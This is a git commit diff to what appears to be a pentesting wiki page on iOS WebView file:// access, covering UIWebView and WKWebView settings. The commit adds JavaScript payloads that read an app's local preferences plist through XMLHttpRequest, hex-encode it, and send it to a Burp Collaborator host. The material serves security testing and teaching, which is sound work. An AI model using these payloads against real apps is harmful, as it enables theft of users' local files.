GitBook: [master] one page modified

This commit is contained in:
CPol 2021-05-30 11:58:38 +00:00 committed by gitbook-bot
parent d38dd12c95
commit 418360ab5c
No known key found for this signature in database
GPG Key ID: 07D2180C7B12D0FF
1 changed files with 41 additions and 1 deletions


@ -174,6 +174,34 @@ $ rabin2 -zz ./WheresMyBrowser | grep -i "loadHTMLString"
* File access from `file://` URLs is always enabled.
* Universal access from `file://` URLs is always enabled.
* If you retrieve the effective origin from a `UIWebView` where `baseURL` is also set to `nil` you will see that it is **not set to "null"**, instead you'll obtain something similar to the following: `applewebdata://5361016c-f4a0-4305-816b-65411fc1d78`0. This origin "applewebdata://" is similar to the "file://" origin as it **does not implement Same-Origin Policy** and allow access to local files and any web resources.
{% tabs %}
{% tab title="exfiltrate\_file" %}
```javascript
String.prototype.hexEncode = function(){
var hex, i;
var result = "";
for (i=0; i<this.length; i++) {
hex = this.charCodeAt(i).toString(16);
result += ("000"+hex).slice(-4);
}
return result
}
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function() {
if (xhr.readyState == XMLHttpRequest.DONE) {
var xhr2 = new XMLHttpRequest();
xhr2.open('GET', 'http://187e2gd0zxunzmb5vlowsz4j1a70vp.burpcollaborator.net/'+xhr.responseText.hexEncode(), true);
xhr2.send(null);
}
}
xhr.open('GET', 'file:///var/mobile/Containers/Data/Application/ED4E0AD8-F7F7-4078-93CC-C350465048A5/Library/Preferences/com.authenticationfailure.WheresMyBrowser.plist', true);
xhr.send(null);
```
{% endtab %}
{% endtabs %}
* **WKWebView**:
* **`allowFileAccessFromFileURLs`** \(`WKPreferences`, `false` by default\): it enables JavaScript running in the context of a `file://` scheme URL to access content from other `file://` scheme URLs.
* **`allowUniversalAccessFromFileURLs`** \(`WKWebViewConfiguration`, `false` by default\): it enables JavaScript running in the context of a `file://` scheme URL to access content from any origin.
@ -214,11 +242,23 @@ allowUniversalAccessFromFileURLs: 0
#### Exfiltrate arbitrary files
```javascript
//For some reason this payload doesn't work!!
//Let me know if you know how to exfiltrate local files from a WKWebView
String.prototype.hexEncode = function(){
var hex, i;
var result = "";
for (i=0; i<this.length; i++) {
hex = this.charCodeAt(i).toString(16);
result += ("000"+hex).slice(-4);
}
return result
}
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function() {
if (xhr.readyState == XMLHttpRequest.DONE) {
var xhr2 = new XMLHttpRequest();
xhr2.open('GET', 'http://187e2gd0zxunzmb5vlowsz4j1a70vp.burpcollaborator.net/'+btoa(), true);
xhr2.open('GET', 'http://187e2gd0zxunzmb5vlowsz4j1a70vp.burpcollaborator.net/'+xhr.responseText.hexEncode(), true);
xhr2.send(null);
}
}